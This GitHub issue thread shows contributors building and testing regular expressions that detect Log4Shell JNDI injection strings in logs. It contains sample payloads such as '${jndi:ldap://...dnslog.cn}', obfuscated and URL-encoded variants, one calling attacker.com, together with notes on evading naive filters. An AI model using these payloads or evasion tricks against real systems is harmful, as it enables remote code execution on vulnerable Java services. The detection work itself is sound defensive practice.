-
Notifications
You must be signed in to change notification settings - Fork 123
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Doing just the same using a RegEx #5
Comments
That's really nice. Let me see if I can verify the regex and add it to the gist in which we use grep. https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b |
I can't make it match on my log files with
Maybe egrep is somehow limited - missing back referencing e.g. Log line in one of the test files
|
Not yet testen on egrep/cli in general. |
Sorry, I'm working on 5-7 other construction sites (YARA, Sigma, Python script, advisory for customers). |
Agreed that this is doable with a regex, but that’s also going to miss payloads (e.g. ¹ EDIT: Turns out the former won't work by default because |
Hi I just now managed to test the regex on the CLI. Current limitations:
➜ test-cases git:(main) ls | grep -E "log$"
test-java-exception.log
test-log-heavy-obfusc.log
test-log-log4shell-casing.log
test-log-log4shell-obf1.log
test-log-log4shell.log
test-shouldnt-match1.log
test-shouldnt-match2.log
test-url-encoded.log
test-urldecode-shouldnt-match.log
➜ test-cases git:(main) grep -V | head -n 1
grep (GNU grep) 3.4
➜ test-cases git:(main) grep -r -P '(?:\$|%24)(?:{|%7[Bb]).{0,30}(?:j|J|%[64][Aa]).{0,30}(?:n|N|%[64][Ee]).{0,30}(?:d|D|%[64]4).{0,30}(?:i|I|%[64]9).{0,30}(?::|%3[Aa]).{0,30}(?:(?:l|L||%[64][Cc]).{0,30}(?:d|D|%[64]4).{0,30}(?:a|A|%[64]1).{0,30}(?:p|P|%[75]0)(?:.{0,30}(?:s|S|%[72]3))?|(?:r|R|%[72]2).{0,30}(?:m|M|%[64][Dd]).{0,30}(?:i|I|%[64]9)|(?:d|D|%[64]4).{0,30}(?:n|N|%[64][Ee]).{0,30}(?:s|S|%[72]3)).{0,30}(?::|%3[Aa])'
test-log-log4shell.log:2021-12-11 [MyApp] - Contains ${jndi:ldap://tj5udg.dnslog.cn}
test-log-log4shell-obf1.log:2021-12-11 [MyApp] - Contains ${jndi:ldap://spfcbf${lower:.}dnslog${lower:.}cn}
test-url-encoded.log:2021-12-11 [MyApp] - Contains $%7Bjndi:ldap://tj5udg.dnslog.cn%7D
test-log-log4shell-casing.log:2021-12-11 [MyApp] - Contains ${jNdI:ldAp://tj5udg.dnslog.cn}
test-log-heavy-obfusc.log:2021-12-11 [MyApp] - Contains ${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attacker.com/a} Maybe I manage to work on a version containing the missing protocols: nis|iiop|corba|nds|http |
Yes, please. We can replace the regex in this advisory with your version if it is able to cover the old strings and their obfuscated version. I wouldn't replace it as long as it can't detect the other protocols. |
Since the RegEx has become a bit more complicated, I created a script that generates the RegEx and put it in its own repo log4shell-rex to make it easier to extend later. Feel free to take it for or refference it in your gist.
|
You might want to try against this synthetic corpus, which is also trying to model what sort of attacks might be coming (or that are already being missed):
You can see how my detections fare, and run your own examples against the I don’t think there’s going to be one regex to rule them all because there’s a signal to noise trade off that needs to be considered. You’d ideally match on all of them and build a confidence score naïve Bayes style. But you want to encode as few assumptions into your detections as possible, otherwise you literally won’t know what you’re missing. |
@karanlyons wondering if exploit is possible without any protocol given and without forward slash: e.g. Not yet sure about false positive rate |
https://logging.apache.org/log4j/2.x/manual/lookups.html#JndiLookup:
https://docs.oracle.com/javase/jndi/tutorial/beyond/misc/policy.html:
So a contrived example would be, e.g., that there’s Also keep in mind that Have you tried testing the detections I’ve linked above? You can get an idea of their sensitivities by throwing a corpus of known vectors and a corpus of theorized probably vectors at it. The usage.md file shows some example vectors and which detections they trigger. I’d really recommend just using them, and weighting your prioritization for any hits based on the confusion matrix you’re seeing for them with the data in your environment. But your best plan of action is just to upgrade or mitigate (rm ¹ EDIT: Again, because |
THX @karanlyons I did some improvements on my RegEx and already get quite good coverage. |
I’d still recommend that people use the collection of regexes I’ve put together as they’re free of assumptions. For example: >>> from log4shell_regexes import *
>>> t = lambda s: [k for k in test(s)]
>>> BACK2ROOT_RE = re.compile(r'[elided for comment]')
>>> BACK2ROOT_RE.search('${env:ZILCH:-jnd${lower:${upper:ı}}://addr}') or False
False
>>> t('${env:ZILCH:-jnd${lower:${upper:ı}}://addr}')
['NESTED_RE', 'NESTED_INCLUDING_ESCAPES_RE', 'ANY_RE', 'ANY_INCLUDING_ESCAPES_RE', 'NESTED_OPT_RCURLY_RE', 'NESTED_INCLUDING_ESCAPES_OPT_RCURLY_RE', 'ANY_OPT_RCURLY_RE', 'ANY_INCLUDING_ESCAPES_OPT_RCURLY_RE'] If you’re having trouble just getting the regexes for use elsewhere, this is very easy to do: >>> from log4shell_regexes import regexes
>>> for n, r in regexes.items(): print (f'{n}: {r.pattern}')
SIMPLE_RE: \$\{\s*jndi\s*:.*\}
SIMPLE_WITH_ESCAPED_CONTENT_RE: \$\{.*(?:\\|%).*\}
NESTED_RE: \$\{.*\$\{.*\}.*\}
NESTED_INCLUDING_ESCAPES_RE: (?:(?:\$|\\u0024||\\x24|\\0?44|%24)(?:\{|\\u007B|\\x7B|\\173|%7B).*){2}(?:\}|\\u007D|\\x7D|\\175|%7D).*(?:\}|\\u007D|\\x7D|\\175|%7D)
ANY_RE: \$\{.*\}
ANY_INCLUDING_ESCAPES_RE: (?:\$|\\u0024||\\x24|\\0?44|%24)(?:\{|\\u007B|\\x7B|\\173|%7B).*(?:\}|\\u007D|\\x7D|\\175|%7D)
SIMPLE_OPT_RCURLY_RE: \$\{\s*jndi\s*:.*\}?
SIMPLE_WITH_ESCAPED_CONTENT_OPT_RCURLY_RE: \$\{.*(?:\\|%).*\}?
NESTED_OPT_RCURLY_RE: \$\{.*\$\{.*\}.*\}?
NESTED_INCLUDING_ESCAPES_OPT_RCURLY_RE: (?:(?:\$|\\u0024||\\x24|\\0?44|%24)(?:\{|\\u007B|\\x7B|\\173|%7B).*){2}(?:\}|\\u007D|\\x7D|\\175|%7D).*(?:\}|\\u007D|\\x7D|\\175|%7D)?
ANY_OPT_RCURLY_RE: \$\{.*\}?
ANY_INCLUDING_ESCAPES_OPT_RCURLY_RE: (?:\$|\\u0024||\\x24|\\0?44|%24)(?:\{|\\u007B|\\x7B|\\173|%7B).*(?:\}|\\u007D|\\x7D|\\175|%7D)? |
Updated my regex |
The following RegEx is just the equivalent.
Don't know, if it's not a reasonable regular expression anymore, but it's doable:
It matches the following strings, even if they are (partially) URL-encoded and case-insensitive:
Example:
Improvement Idea for the Script:
To reduce false positive chance and improve performance a bit, you could maybe force, that the '$' sign in the start is immediately followed by a '{'.
The text was updated successfully, but these errors were encountered: